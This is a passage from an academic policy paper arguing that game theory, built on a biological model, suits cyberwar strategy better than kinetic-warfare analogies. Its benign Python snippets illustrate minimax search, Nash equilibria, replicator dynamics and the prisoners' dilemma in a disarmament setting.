with conflicting payoffs...” (Jamakka et al., 2005: 14). If the parties do not reach stasis then by<br />
definition the game will continue because players have an incentive to change their decision--it is only<br />
at equilibrium that (optimal payout exists and therefore) there is no incentive to change decisions.<br />
Accordingly, this paper's analysis begins from an acknowledgment that in cyberwar, there may be no<br />
“solution.” In cyberwar, unlike in checkers, game theory cannot follow each decision path to its<br />
conclusion and then trace the right decisions back. The “right decisions” may evolve and the endpoint,<br />
if there is one, is unknown. However, game theory continues to be useful in cyberwar strategy<br />
because the rational predictability of game theory will continue to drive decisions and seek out<br />
patterns in them, and because game theory may identify and intelligently weight nodes of a decision<br />
tree that are not immediately recognizable or historically favored by human decision-makers.<br />
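The checkers-style procedure described here, following each path to its conclusion and tracing the right decisions back, is backward induction over a game tree, and the node values are where the "intelligent weighting" enters. A toy sketch (the tree and its leaf weights are hypothetical analyst-assigned values, not data from any cyber scenario):

```python
# Backward induction (minimax) on a toy game tree. A leaf is a number
# (an analyst-assigned weight for that outcome); an internal node is a
# list of children, with players alternating max and min.

def minimax(node, maximizing=True):
    if isinstance(node, (int, float)):
        return node  # leaf: the weighted value of this outcome
    values = [minimax(child, not maximizing) for child in node]
    return max(values) if maximizing else min(values)

# Three options for us; for each, the adversary picks the worst outcome.
tree = [[3, 12], [2, 4], [14, 5]]
print(minimax(tree))  # 5: the best outcome we can guarantee
```

In cyberwar the tree has no known terminal layer, which is exactly why this paper treats game theory as a weighting tool rather than a solution procedure.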
The paper begins by acknowledging a number of ways in which cyberwar defies traditional game<br />
theory models. It describes why a biological model is the most useful analogy, including the<br />
epidemiological response to invasion and the evolutionary tendency toward equilibrium. Then it<br />
explores the benefits of game theory, describing ways in which it is a uniquely useful tool for<br />
cyberwarfare strategy as an ongoing set of decisions in a changing set of conditions.<br />
3. Limits to using game theory<br />
3.1 The economics of cyber insecurity<br />
Game theoretical explorations assume perfect rationality, but economically, there are a number of<br />
ways in which the current cybersecurity system lacks the incentives to operate at what might be<br />
termed “rational” full strength. One is the problem of externalities: as with air pollution, most individuals<br />
underinvest in their own security out of a perception that the problem (and its solution) does not target<br />
them directly (Anderson and Moore 2006). This emerges in many contexts where vulnerabilities are<br />
not clearly attributable to the responsible actor; Daniel Geer, Chief Information Security Officer of the<br />
Central Intelligence Agency's venture capital fund In-Q-Tel (2010), drew a comparison to the<br />
evolution of laws that would enforce responsibility for cleaning up a toxic waste spill and dealing with<br />
those affected by it. Personal underinvestment in security means vulnerability to botnet appropriation<br />
of computers, as well as facilitation of anonymity-inducing programs like Tor, which allow a hacker to<br />
stage a virtually untraceable attack (see, e.g., Wilson 2008). The number of computers under remote botnet<br />
control is growing at an average of 378% each year, according to the grassroots security monitoring<br />
organization Project Honey Pot; this translates into easier launching of distributed denial-of-service (DDoS)<br />
attacks and a decreased likelihood of tracing an attack. The DDoS attacks—both against Wikileaks (Carney<br />
2010) and against its detractors (Reuters 2010)—made use of those who passively or voluntarily<br />
submitted their computers to botnet control.<br />
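The externality argument can be restated game-theoretically. In the hypothetical payoffs below (our illustration, not figures from the sources cited), each user pays 4 to invest in security but the investment benefits both users by 3, so rational players free-ride and the unique equilibrium is mutual underinvestment:

```python
# A two-player security-investment game with hypothetical payoffs,
# illustrating underinvestment driven by externalities. Investing costs 4;
# each investment benefits *both* players by 3 (security as a public good).
from itertools import product

ACTIONS = ("invest", "skip")

def payoff(mine, theirs):
    investors = (mine == "invest") + (theirs == "invest")
    return 3 * investors - (4 if mine == "invest" else 0)

def pure_nash_equilibria():
    """Profiles where each player's action is a best response to the other's."""
    found = []
    for a1, a2 in product(ACTIONS, repeat=2):
        if (all(payoff(a1, a2) >= payoff(x, a2) for x in ACTIONS) and
                all(payoff(a2, a1) >= payoff(x, a1) for x in ACTIONS)):
            found.append((a1, a2))
    return found

print(pure_nash_equilibria())      # [('skip', 'skip')] -- nobody invests
print(payoff("invest", "invest"))  # 2: both would be better off investing
```

The structure is a prisoner's dilemma: mutual investment pays each player 2, yet "skip" is the dominant strategy, which is the formal version of the underinvestment Anderson and Moore describe.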
Internet founder Vint Cerf (in Schofield, 2008) made the Hobbesian observation that “[i]t seems every<br />
machine has to defend itself. The Internet was designed that way. It's every man for himself.” The<br />
Internet may require individuals to self-protect, but it wasn't “designed” for individuals to take the reins<br />
in security—it was simply not designed for security. It is designed, to the extent that one can say it<br />
was designed, for openness. Security may fall to individuals but the current structure doesn't provide<br />
the necessary incentives for them to make that investment. Game theoretical assumptions about<br />
rationality are thrown off by the human tendency to underinvest when there are externalities. As<br />
software engineer Brad Shapcott famously said, “The Internet isn't free. It just has an economy that<br />
makes no sense to capitalism.”<br />
Re-aligning incentives to prioritize an optimal level of individual cybersecurity investment is an<br />
economics task, but no one has ownership of the problem or the impetus to even get robust<br />
information about it. As Jonathan Zittrain (Harvard Law 2010) stated, “Because no one owns this<br />
problem, no one is paying for monitoring software to get the picture they need, to be accurate.”<br />
By contrast, in the private sector economic objectives often reward security—such as in the case study<br />
of the US banking industry compared with the UK banking industry. In US bank security, credit card<br />
fraud has been the responsibility of the bank. UK banks initially refused responsibility for ATM error,<br />
which created a “moral hazard” incentive for bank employees to act carelessly (Anderson and Moore<br />
2006: 610-613).<br />
On a higher level of abstraction, there are externalities because of government reliance on private<br />
sector cybersecurity technology. When this reliance couples with any tolerance for inefficiencies, such<br />
as those that result from revolving-door corruption or transparency concerns, it constricts the<br />
competitiveness of government contract assignment. This produces high-level inefficiencies. (See<br />
Baram 2009). According to a study by the Center for Public Integrity, only about one-third of Pentagon<br />
contracts were awarded following competition between two or more bidders. (Calbreath 2005). The<br />
cost premium of outsourcing defense contracts to private sector providers is only justified by the<br />
innovation push that the private sector is assumed to have; if government-to-company contracts are<br />
instead funneled through sole-source contracts, this innovation advantage assumption may not be<br />
valid, and the price premium may not be justified. (See Arnold, S. A. et al., 2009: 25). Small levels of<br />
distorted investment can produce large results in absolute terms because the numbers are so large--<br />
the total investment in research, development, test and evaluation (RDT&E) and procurement funds<br />
for the DoD major defense acquisitions portfolio is a staggering $1.6 trillion yearly (GAO Report 2009).<br />
3.2 Imperfect competition and the investment-to-security payout<br />
Companies are moved by (and have a legal fiduciary duty to prioritize) their own bottom line; there is<br />
no independent incentive to collaborate toward producing high-quality security products. Thus at the<br />
federal level, great dependency on private contractors in the cyber weapons arena can distort cost<br />
efficiency calculations in game theory. Our investment in security may not lead linearly to a higher-<br />
security end-result, as is presumed by security-investment-level calculations. See, e.g., Schavland,<br />
Chan and Raines (2009:629): “Our model places a dollar valuation on the insurance we are willing to<br />
purchase for information security." Yet the assumption of a linear connection between investment and<br />
security is generally inaccurate. Karen Evans, Administrator for Electronic Government and Information<br />
Technology, Office of Management and Budget (2007), emphasized in a statement to a congressional<br />
subcommittee that when it comes to e-security, neither high spending nor high regulatory compliance<br />
translates directly to actual higher security.<br />
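The nonlinearity can be illustrated with a toy diminishing-returns curve (an assumption for illustration, not a model from Evans or Schavland et al.): if breach probability falls off exponentially with spending, each additional dollar buys less security than the last, so doubling the budget never doubles the protection:

```python
# Toy illustration of a nonlinear investment-to-security relationship.
# The exponential decay curve and its parameters are hypothetical.
import math

def breach_probability(spend, baseline=0.5, efficiency=0.01):
    """Assumed curve: breach probability at a given spending level."""
    return baseline * math.exp(-efficiency * spend)

risk_at = {s: breach_probability(s) for s in (0, 100, 200, 300)}
gains = [risk_at[s] - risk_at[s + 100] for s in (0, 100, 200)]
print(gains)  # each successive $100 buys a strictly smaller risk reduction
```

Under such a curve a security-investment-level calculation that assumes a linear payout will systematically overvalue large budgets.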
Because of the private sector's lack of incentives to collaborate, coupled with private companies'<br />
incentives not to divulge information about breaches (see, e.g., Gal-Or and Ghose 2004), there is an<br />
opacity about cybersecurity vulnerabilities which can produce misinformation. For instance, there<br />
has been a longstanding assumption that cyberattackers are exploiting unpatched computers after the<br />
patch has been released-- Internet security expert Eric Rescorla (2004) has even argued against<br />
disclosure and frequent patching for this reason. However, the latest Verizon data breach report does<br />
not support this: "In the past we have discussed a decreasing number of attacks that exploit software<br />
or system vulnerabilities versus those that exploit configuration weaknesses or functionality…[This<br />
year] there wasn‟t a single confirmed intrusion that exploited a patchable vulnerability” (2010: 29). In<br />
other words, as Verizon‟s 2009 Report stated, "vulnerabilities are certainly a problem contributing to<br />
data breaches but patching faster is not the solution” (2009:18).<br />
Another concrete instance of misinformation is the “60 Minutes” segment (2009) that claimed<br />
that the Brazilian power grid was taken down by hackers. While the video was widely accepted and<br />
generated apocalyptic fears, Bob Giesler, Vice President for Cyber Programs at SAIC, soon dismissed<br />
the video as “part of the dialogue that is absolutely wrong. The Brazilian power grid dropped<br />
because of poor and faulty maintenance.” Giesler was corroborated when Wired Magazine (2009)<br />
reported that there was an investigation, and the blackout was “actually the result of a utility<br />
company’s negligent maintenance of high voltage insulators on two transmission lines.”<br />
Misinformation about our cyber nemeses obscures analysis of policy needs and threat prioritization.<br />
Game theory cannot apply efficiently when we miscalculate or fail to identify those against whom we<br />
are playing.<br />
4. Moving from a linear to a biological model<br />
Heavy reliance on the private sector for cyber development means the DoD must use a customer-driven<br />
intelligence model, identifying needs and contracting for them. Yet competition for contracts does not<br />
occur in a perfectly competitive environment, and reliance upon it incorrectly presumes that the<br />
government has perfect information about its own needs and the risks of disclosing them. Umehara<br />
and Ohta (2009: 323) model transparency as a zero-sum game, and “assume that when a<br />
government agency makes a decision it knows the total amount of the potential damage.” We may<br />
need to reevaluate the customer-driven intelligence model to find ways to harness more of the<br />
brainpower that exists not only in the private sector but also within the nonprofit, academic, and<br />
government domains, such as the working group that came together to face the Conficker worm<br />
challenge (See Moscaritolo 2009).<br />
Similarly, there are “weapons” confronting the DoD in the cyber arena that do not come from<br />
traditional or foreign enemies, such as the Wikileaks disclosures. As Giesler (2009) phrased it, “The<br />
challenge to the government is: how do you harness that decentralized, netcentric organism? How do<br />
you enable the ecosystem's antibodies to react to these things as opposed to regulating and breaking<br />
it down? How do you nurture that reaction?” This decentralized power emerged in the response to<br />
Pakistan blocking YouTube; as Jonathan Zittrain (2009) recounts, this was a crisis to which NANOG,<br />
“an informal network of nerds, some of whom work for various ISPs,” promptly responded.<br />
Cyberwar strategy requires us to think outside of a linear security-investment frame of mind toward<br />
weapons development. The most accurate model of the cyber threat appears to be biological, and<br />
specifically epidemiological, in its response to invasion. In the case of the Estonian<br />
cyberattacks, Giesler (2009) offers as an example, “it was the banking sector, it was the telco sector that<br />
responded,” and “I started to think ‘Maybe that's the right model. This stuff is so decentralized, the<br />
problem is so pervasive and so fast…how you organize around a problem will dictate how you solve it<br />
and it requires a lot more dialogue.’” The Department of Defense has recognized this interweaving of<br />
capabilities and data, and released the more oblique statement, “We are in the Age of<br />
Interdependence, out of the Information Age” (DoD 2009 Vision Conference).<br />
Effective cyberintrusion defenses mirror the epidemiological model for responding to an invader.<br />
Some have warned of a “cyber Pearl Harbor”; this framing seems too rooted in the kinetic world to be an accurate<br />
description of the threat. As Giesler asserts, we ought to be talking about cyber-destruction like a<br />
cancer: “you already have it, it’s hard to detect, it may be fatal but it’s also treatable.” It may be that<br />
the best responses to cyberwar are not found by studying war—at least not the ones in our history<br />
books involving cannons or tanks.<br />
Similarly, rather than a process of continual growth, cyber evolution, like biological evolution, seems<br />
more aptly characterized as punctuated equilibrium—fairly long periods of relative stasis followed by<br />
quick, drastic periods of breakthrough. (An example of a breakthrough in the cyber context could be<br />
the advent of cloud computing.) Correspondingly, one reason why reaching Nash equilibrium<br />
is unlikely in the cyberwar context is that under unstable conditions, evolutionarily stable strategies<br />
don’t run a typical course. As evolutionary biologist Klaus Rohde (2005: Appendix 3) writes, “frequent<br />
and drastic abiotic and biotic changes in the environment which affect the fitness (reproductive<br />
success) of potential contestants in evolutionary ‘games’, will make it more difficult to establish<br />
evolutionary stable strategies, because the establishment of an ESS cannot keep up with the<br />
changes.” Because cyber evolution is not linear but organic, it forces us to treat it according to the<br />
economics of biology. The DNI’s “Vision 2015” report addresses the deliverables aspect of this: “We<br />
cannot evolve into the next technology ‘S curve’ incrementally; we need a revolutionary approach.<br />
Breakthrough innovation, disruptive technologies, and rapid transition to end-users will be required…”<br />
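Rohde's point can be illustrated with a minimal Hawk-Dove replicator-dynamics simulation (the payoff values, learning rate, and flip schedule below are assumptions, not the paper's): with a fixed environment the population settles near the stable hawk/dove mix, while a payoff landscape that shifts faster than the population converges never lets a stable strategy establish itself:<br />

```python
# Sketch with assumed parameters: Hawk-Dove replicator dynamics. With a
# fixed resource value V the hawk share settles near the stable mix V/C;
# if the environment flips V faster than the population can converge,
# no evolutionarily stable strategy is ever established.

def hawk_payoffs(p_hawk, V, C=10.0):
    """Expected payoffs of hawk and dove against a population playing
    hawk with probability p_hawk (standard Hawk-Dove payoff matrix)."""
    hawk = p_hawk * (V - C) / 2 + (1 - p_hawk) * V
    dove = (1 - p_hawk) * V / 2
    return hawk, dove

def replicate(p, V, steps, lr=0.01):
    """Nudge the hawk share toward the better-paying strategy each step."""
    for _ in range(steps):
        h, d = hawk_payoffs(p, V)
        p = min(1.0, max(0.0, p + lr * (h - d)))
    return p

stable = replicate(0.5, V=4.0, steps=5000)   # settles near V/C = 0.4
shifting = 0.5
for epoch in range(50):                      # environment flips V repeatedly
    shifting = replicate(shifting, V=4.0 if epoch % 2 == 0 else 8.0, steps=10)
print(round(stable, 2), round(shifting, 2))
```

The first run converges to the equilibrium mix; the second oscillates between two moving targets and never reaches either, which is the "ESS cannot keep up with the changes" dynamic in the quote above.<br />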
Applying game theory to cyberwarfare strategy allows us to make predictions that transcend lockstep<br />
models, that change based on resources, and that take into account other players’ strategies and<br />
environmental conditions. Thus, while game theory offers neither a solution nor even an accurate map of potential<br />
moves, it seems still to be our best tool for transcending the perpetual reactiveness<br />
that has characterized cyber and information security efforts.<br />
5. Uses of game theory<br />
5.1 Layered defense<br />
While cyberwar strategy is a game of imperfect information, there are always choices available, and<br />
the vulnerabilities associated with each choice are not random but are often knowable or predictable,<br />
at least to some extent. We know that the risk of using open-source materials lies in their lack of<br />
restriction; we know that the weakness of highly classified, air-gapped (or, in<br />
Zittrain-speak, “tethered”) networks comes from a loss of functionality and “generativity.” Diversity and<br />
interoperability are tradeoffs, as are embrittlement and toughening. These are zero-sum games; but<br />
the overall strategy is not. While one cannot create a network that is maximally resistant both to random<br />
faults and to targeted faults, one can take into account the particular weaknesses<br />
and likelihoods of attack so that the weaknesses overlap in resistant ways, ways that correspond to<br />
risk preferences and security priorities. As the banking and credit card systems have worked to create<br />
overall robustness through non-overlapping weaknesses, other providers (including infrastructural<br />
ones) could create calculated layers of defense given coordination and appropriate<br />
budgeting.<br />
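The layering argument can be sketched numerically (the stop-probabilities below are hypothetical, and the layers are assumed to fail independently): stacking two layers that share a weakness leaves a common blind spot, while complementary layers cover each other's gaps:<br />

```python
# Sketch under assumed numbers: two defensive layers, each strong against
# one attack class and weak against another. Layers whose weaknesses
# overlap share a blind spot; complementary layers cover each other,
# which is the "non-overlapping weaknesses" idea in the text.

# P(layer stops attack), keyed by attack class
firewall  = {"network": 0.95, "phishing": 0.20}
training  = {"network": 0.10, "phishing": 0.90}
firewall2 = {"network": 0.95, "phishing": 0.20}  # duplicates firewall's blind spot

def breach_prob(layers, attack):
    """Attack succeeds only if it slips past every independent layer."""
    p = 1.0
    for layer in layers:
        p *= 1.0 - layer[attack]
    return p

for attack in ("network", "phishing"):
    print(attack,
          round(breach_prob([firewall, firewall2], attack), 3),  # overlapping
          round(breach_prob([firewall, training], attack), 3))   # complementary
```

With these numbers the doubled firewall leaves phishing a 64% success rate while the complementary pair cuts it to 8%; which mix is preferable depends on exactly the risk preferences and attack likelihoods the text describes.<br />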
5.2 Identifying nodes robustly<br />
In game-theoretic search, the winnowing of possible choices is termed alpha-beta pruning: because there is not an<br />
unlimited number of desirable outcomes, there is not an unlimited number of choices worth evaluating. One<br />
can prune down the number of nodes evaluated in the search tree. Alpha-beta pruning reflects the<br />
fact that as soon as one move can be proven less desirable than another, it need not be further<br />
evaluated. One’s search can then steer toward the more promising subtree(s), creating an optimal<br />
search path.<br />
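The cutoff idea can be sketched as a standard minimax search with alpha-beta pruning over a toy game tree (the tree and its payoffs are invented for illustration):<br />

```python
# A minimal alpha-beta sketch over a hypothetical game tree (nested lists
# as subtrees, integers as leaf payoffs for the maximizer). As soon as one
# move is provably worse than an already-found alternative, its remaining
# subtree is cut off unexplored.

def alphabeta(node, alpha=float("-inf"), beta=float("inf"), maximizing=True):
    if isinstance(node, int):          # leaf: payoff for the maximizer
        return node
    best = float("-inf") if maximizing else float("inf")
    for child in node:
        val = alphabeta(child, alpha, beta, not maximizing)
        if maximizing:
            best = max(best, val)
            alpha = max(alpha, best)
        else:
            best = min(best, val)
            beta = min(beta, best)
        if beta <= alpha:              # cutoff: remaining siblings pruned
            break
    return best

tree = [[3, 5], [2, [9, 1]], [6, 4]]   # assumed toy tree
print(alphabeta(tree))
```

In this toy tree the subtree `[9, 1]` is never examined: its parent is already provably worse than the first move, which is exactly the "need not be further evaluated" step described above.<br />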
To do this effectively first requires diversity and creativity—that is, the ability to identify many possible<br />
nodes. Defense Secretary Robert Gates stated that the Pentagon is “desperately short of people who<br />
have capabilities (defensive and offensive cybersecurity war skills) in all the services and we have to<br />
address it.” (Booz Allen 2009: 1). The key human-side aspect of cyberwar strategy is to effectively<br />
uncover all possible decision paths, which requires foundationally that the Department of Defense do<br />
a more effective job of recruiting and retaining diverse talent.<br />
Identifying new nodes also requires a model that takes into account the creative possibilities that exist<br />
in the cyber world (which do not exist as concretely in, for example, the nuclear world) for moves that<br />
serve what biological models call “posturing”: flexing muscles to show capability rather than to enact<br />
any immediate goal. Species which posture rather than fight tend to compete via a “war of attrition.”<br />
Applying this to international security reveals that there are more available cyberwar decision paths<br />
than those which enact straightforward violence. As Rohde (2010) stated, taking into account<br />
posturing is useful because it accounts for different forms of power on the changing landscape in<br />
which the competition occurs. Rohde explains, “Climate change, for example, may have unforeseen<br />
consequences for how nations behave: a war of attrition may become more aggressive.” This game<br />
cannot be modeled linearly based on how many cannons or bombs a country has stockpiled; actual<br />
capabilities may be less or more than those the country chooses to display. (See, e.g., Woodward<br />
2010 on the “speculative” possibility that Stuxnet was an Israeli attack on an Iranian target.) Cyberwar<br />
posturing requires a model more nuanced than M.A.D. To fully exploit the potential for modeling game<br />
theoretical strategies, we must recruit diverse minds to think up new possible nodes, and validate<br />
different forms of power to determine what strategies serve the end goal.<br />
5.3 Weighting nodes intelligently<br />
Once one isolates the problem and defines the corresponding set of goals in a given situation, one<br />
must evaluate the other players’ likely moves. Game theory can play an important role at this stage<br />
because it is well-established that human cognition tends not to react to threats in a fully rational way,<br />
or as economics would dictate. Jonathan Renshon and Nobel Prize winner Daniel Kahneman have<br />
written on these human cognitive obstacles to economically-optimal decisions. According to<br />
Kahneman and Renshon (2006), “humans cannot make the rational calculations required by<br />
conventional economics. They rather tend to take mental shortcuts that may lead to erroneous<br />
predictions, i.e., they are biased.” Using game theory to make a security strategy that is a calculated<br />
derivative of mapped potential outcomes allows decisionmakers to lessen those biases and respond<br />
to threats proportionately and economically.<br />
The fact that there are limited existing examples of cyberwarfare interactions complicates this stage of<br />
analysis, since successful programming in games like chess and Othello has relied upon finite patterns of<br />
previous actions: “A hill climbing algorithm can… be used based on a function of the number of<br />
correct opponent move predictions taken from a list of previous opponent moves or games” (Hamilton<br />
et al., 2002: 4). Lack of behavioral precedent models will increase the margin of error: if one could<br />
use a killer heuristic (prioritizing moves that have been shown to produce cutoffs in other situations),<br />
the pruning would be more successful (Winands 2004). It is possible that red-teaming could provide<br />
some approximations of history—indeed, one of the recommendations in the Report of the Defense<br />
Science Board (2010: viii) is to “establish red teaming as the norm instead of the exception.” And all<br />
players must play on the board of limited empirical history.<br />
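A minimal sketch of such history-based weighting (with a hypothetical move vocabulary and history) ranks candidate opponent moves by their past frequency, in the spirit of the hill-climbing and killer-heuristic ordering cited above; with thin history, the ranking carries little information:<br />

```python
# Sketch with assumed data: order candidate opponent moves by how often
# each appeared in past play, in the spirit of the history-based prediction
# and killer-move ordering cited above. A thin history yields a ranking
# barely better than arbitrary, which is the cyber problem.

from collections import Counter

def rank_moves(candidates, history):
    """Weight each candidate move by its frequency in past opponent play."""
    freq = Counter(history)
    return sorted(candidates, key=lambda m: freq[m], reverse=True)

rich_history = ["phish", "ddos", "phish", "scan", "phish", "ddos"]
thin_history = ["scan"]

moves = ["scan", "ddos", "phish"]
print(rank_moves(moves, rich_history))   # best-supported guess first
print(rank_moves(moves, thin_history))
```

Chess programs can lean on millions of recorded games to build `history`; the cyber analyst has at best a red-team approximation of it.<br />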
In a related sense, the use of game theory to assign weight neutrally to the nodes of a decision<br />
tree may be especially valuable in the cyber context because our reactions seem to derive from<br />
evolutionary strategies, and cyber may activate those uniquely. Having a “face” on the threat is crucial<br />
to our reaction, according to psychologist Daniel Gilbert (2007), who offers as an example that global<br />
warming does not push our buttons the way terrorism and other threats “with a mustache” do (think of the<br />
resources we devote to deaths by terrorism, compared to deaths by cancer or hunger). Cyberwar has<br />
a sanitized quality to it: unlike bombs and tanks, it does not necessitate face-to-face<br />
confrontation with the effects of one’s decisions (see Baer 2010b).<br />
6. Avoiding cyberwar: Could we have cyber disarmament?<br />
The economic inefficiencies of an offensive cyber arms race (not to mention the danger of allowing<br />
the US and others to stockpile a cyber arsenal) have led some to propose solutions to avoid this<br />
altogether. Harvard Professor Jack Goldsmith (2010) has proposed something akin to an international<br />
negotiating architecture to preempt cyberwar and the costs of cyberdefense. Certainly, the U.S. would<br />
benefit from having red lines drawn. But even if we had the prescience to create a set of<br />
rules that would anticipate the new ways in which the Internet will be useful for attack (which is<br />
unlikely given the range of possibilities, many of which might not be directly violent: “the range of<br />
possible options is very large, so that cyberattack-based operations might be set in motion to<br />
influence an election, instigate conflict between political factions, harass disfavored leaders or entities,<br />
or divert money” (National Research Council Committee on Offensive Information Warfare, Section<br />
1.5)), there seems to be no way to guarantee China’s (or North Korea’s or Russia’s) compliance<br />
unless there is some enforcement machinery, and some remedy in instances of transgression.<br />
Cheating seems almost assured considering that, for instance, North Korea continually reneges on its<br />
nuclear negotiations, and cyber disarmament would be pragmatically much easier to cheat on.<br />
Even if we could get a global cyber-enforcement organization in place, cyber attribution problems<br />
would allow for rogue states (let alone non-nation-state actors which have no real duty to comply and<br />
are harder to retaliate against) to act outside of the red tape. Defectors could get a comparative<br />
advantage by cheating (think of the classic prisoners’ dilemma, in which defecting is always the<br />
optimal strategy even though it doesn’t produce the optimal outcome overall), and could do it remotely<br />
through US computers, as in the Estonia attack. For a disarmament agreement to be enforceable<br />
would require a change in the Internet architecture in the sense of decreasing anonymity or some<br />
other sea change to incentivize compliance. One could impose sanctions on nations that allow attacks<br />
to happen, but this strict liability regime would confront practical problems: accurate attribution<br />
is difficult, and in fact the latest numbers reflect more botnet-appropriated computers in the U.S. than<br />
anywhere else (Prince 2010). Establishing cyber rules and then not being able to enforce them<br />
because of attribution problems could be embarrassing.<br />
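The prisoners' dilemma invoked above can be made concrete with the textbook payoff matrix (the numbers are the standard illustrative ones, not drawn from the paper):<br />

```python
# The classic prisoners' dilemma, with textbook payoffs (higher is better).
# Defect strictly dominates cooperate for each player, yet mutual defection
# is worse for both than mutual cooperation: the bind any disarmament
# treaty without enforcement would face.

PAYOFF = {  # (my move, their move) -> my payoff
    ("cooperate", "cooperate"): 3,
    ("cooperate", "defect"):    0,
    ("defect",    "cooperate"): 5,
    ("defect",    "defect"):    1,
}

def best_response(their_move):
    """My payoff-maximizing reply to a fixed move by the other player."""
    return max(("cooperate", "defect"), key=lambda m: PAYOFF[(m, their_move)])

# Defecting is the best reply no matter what the other side does...
print(best_response("cooperate"), best_response("defect"))
# ...even though both players would prefer the cooperative outcome.
print(PAYOFF[("cooperate", "cooperate")], ">", PAYOFF[("defect", "defect")])
```

Reading "cooperate" as honoring a cyber-disarmament pact and "defect" as covertly retaining capability, the dominance of defection is the cheating incentive described above.<br />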
Moreover, like nuclear war game theory, cyberwar game theory decision paths are complicated by the<br />
fact that there are differences in risk tolerance among players. Thus, while “the usual assumption is<br />
that an opponent evaluation function uses a subset of the heuristics in our own evaluation function,<br />
with different weights” (Hamilton et al. 2002: 4), the heuristics of cyber players may vary dramatically,<br />
especially in interactions between countries with generally greater risk tolerance regimes in<br />
government. Since “players' decisions are optimally based not only on their own cost functions (which<br />
each knows) but also on their opponent's cost structure (which is known only in probability)”<br />
(McCormick and Owen 2006), we cannot assume that our incentives for desiring disarmament match<br />
other players’.<br />
Larger values-based issues require us to evaluate what kind of behavior we find acceptable online<br />
and what is a violation of international ethics or human rights. This is part of a dialogue that needs to<br />
occur before a legal framework can enforce it. As I have written, we all have a stake in this<br />
determination (Baer 2010a). The purpose of this paper, however, was to explore the strategic possibilities,<br />
not the broader development of a code of human rights online.<br />
7. Conclusions<br />
Game theory is not a panacea. As I have described, cyberwarfare defies a number of common game<br />
theoretic assumptions. However, it is worth exploring game theory’s applications to cyberwarfare<br />
strategy because game theory lends itself to viewing larger patterns, and approaching problems<br />
holistically. In cyber, the lines between fighting and research melt away, and the computer scientists<br />
mobilizing the tools to wage cyberwar look more like Mozart or Einstein than Napoleon. Following the<br />
symmetries that occur in the natural world, the responses of epidemiology and the growth patterns of<br />
evolutionary biology, game theory allows us to gauge efficacy in a non-linear dimension. Many<br />
experts have compared cyberwar strategy to kinetic-world models, from nuclear strategy (Chertoff, in<br />
Espiner 2010) to air warfare strategy (Baker 2010). I find that kinetic-world models of warfare fall short<br />
of describing the problem of cyberwarfare or its possible treatments. There is no real winning in<br />
cyberwar; there is continual reorientation.<br />
Game theory, worked upon a biological model, holds promise for cyberwar strategy because it<br />
transcends linear models that assume aspects of the landscape to be fixed. Cyberwarfare is delicate<br />
but not haphazard, and game theory can guide decisions that address true threats by avoiding human<br />
bias. If we maintain a robust workforce, game theory can also allow decisionmakers to identify<br />
emerging nodes on the decision tree. In an Occam’s razor sense, it may be that to anticipate the curve<br />
in the cyberwarfare game, we ought to return to the simple beauty of early programming, when the<br />
Internet was unmolded, an organic cell of potential energy. Cyber development eludes kinetic-world<br />
models because it is not just about harnessing power, it is about creating new pockets of utility and<br />
exploiting them in creative ways.<br />
Acknowledgements<br />
Thanks to Professor Jack Goldsmith for the opportunity to write a first version of this research in<br />
seminar and for the exposure to many of cyberwarfare’s leading minds.<br />
References<br />
Anderson, R. and Moore, T. (2006) “The Economics of Information Security,” Science Vol. 314 No. 5799, pp.<br />
610-613.<br />
Arnold, S. A., et al. (2009) "Can Profit Policy and Contract Incentives Improve Defense Contract Outcomes?"<br />
Institute for Defense Analyses, Washington, DC.<br />
Baer, M. (2010a) “Cyberstalking, and the Internet Landscape We Have Constructed.” Virginia Journal of Law and<br />
Technology 154 Vol. 15, No. 2.<br />
-- (2010b) “Cyber Attacks & the Ethical Dimension of the Google China Episode,” [online], Global Comment,<br />
http://globalcomment.com/2010/cyber-attacks-the-ethical-dimension-of-the-google-china-episode/<br />
Baker, S. (2010) “Cyberwar: What is it Good For?” ABA 20th Annual Review of the Field of National Security Law,<br />
Washington, DC.<br />
Baram, M. (2009) “Wasteful Spending by Private Contractors in Afghanistan Climbs to $1 Billion, as their<br />
Numbers Multiply,” Huffington Post.<br />
Booz Allen Hamilton (2009) “Cyber In-Security: Strengthening the Federal Cybersecurity Workforce,” [online],<br />
http://www.ourpublicservice.org/OPS/publications/viewcontentdetails.php?id=135<br />
Calbreath, D. (2005) "MZM Scandal Illuminates Defense Contract Tactics," [online], Sign on San Diego,<br />
http://archives.signonsandiego.com/news/politics/cunningham/20050821-87-mzmscand.html<br />
Carney, J. (2010) “The War Against Wikileaks is Worse than Wikileaks,” [online], CNBC,<br />
http://www.cnbc.com/id/40551046/<br />
CBS News (2009) “Cyber War: Sabotaging the System” 60 Minutes,<br />
http://www.cbsnews.com/stories/2009/11/06/60minutes/main5555565_page1.shtml?tag=contentMain;contentBody<br />
Charney, S. (2009) “Reviewing the Federal Cybersecurity Mission,” Testimony Before the U.S. House Committee<br />
on Homeland Security Subcommittee on Emerging Threats, Cybersecurity, and Science and Technology,<br />
Washington, DC.<br />
Clockbackward (2009) “Does Beauty Equal Truth in Physics and Math?” [online], Clockbackward Essays,<br />
http://www.clockbackward.com/2009/03/11/does-beauty-equal-truth-in-physics-and-math/<br />
DoD 45 th Annual Federal Forecast (2009) Department of Defense Special Topic Cyber Security: TechAmerica<br />
2009 Vision <strong>Conference</strong>, Washington, DC.<br />
Director of National Intelligence, “Vision 2015: A Globally Networked and Integrated Intelligence Enterprise,”<br />
[online], http://www.dni.gov/Vision_2015.pdf<br />
Espiner, T. (2010) “Chertoff Advances Cyber Cold War,” [online], ZDNet UK<br />
http://www.zdnet.co.uk/news/security-threats/2010/10/14/chertoff-advocates-cyber-cold-war-40090538/<br />
Gal-Or, E. and Ghose, A. (2004), “The Economic Consequences of Sharing Security Information,” Economics of<br />
Information Security, Vol. 12, pp. 95-104.<br />
GAO Report to Congressional Committees (2009) "Defense Acquisitions: Assessments of Selected Weapons<br />
Plans," [online], http://www.gao.gov/new.items/d09326sp.pdf<br />
Geer, D., Jr., Sc.D. (2010) “Cybersecurity and National Policy,” Harvard National Security Journal, Vol. 1.<br />
Giesler, R. (2009) personal conversation with the author.<br />
Gilbert, D. (2007) “If Only Gay Sex Caused Global Warming,” Huffington Post.<br />
Goldsmith, J. (2010) “Can We Stop the Global Cyber Arms Race?” Washington Post.<br />
Hathaway, M. (2009) “Strategic Advantage: Why America Should Care About Cybersecurity,” Harvard Kennedy<br />
School, Cambridge, MA.<br />
Hamilton, S.N., Miller, W.L., Ott, A., and Saydjari, O.S. (2002) The Role of Game Theory in Information Warfare,<br />
and Challenges in Applying Game Theory to the Domain of Information Warfare, Fourth Information<br />
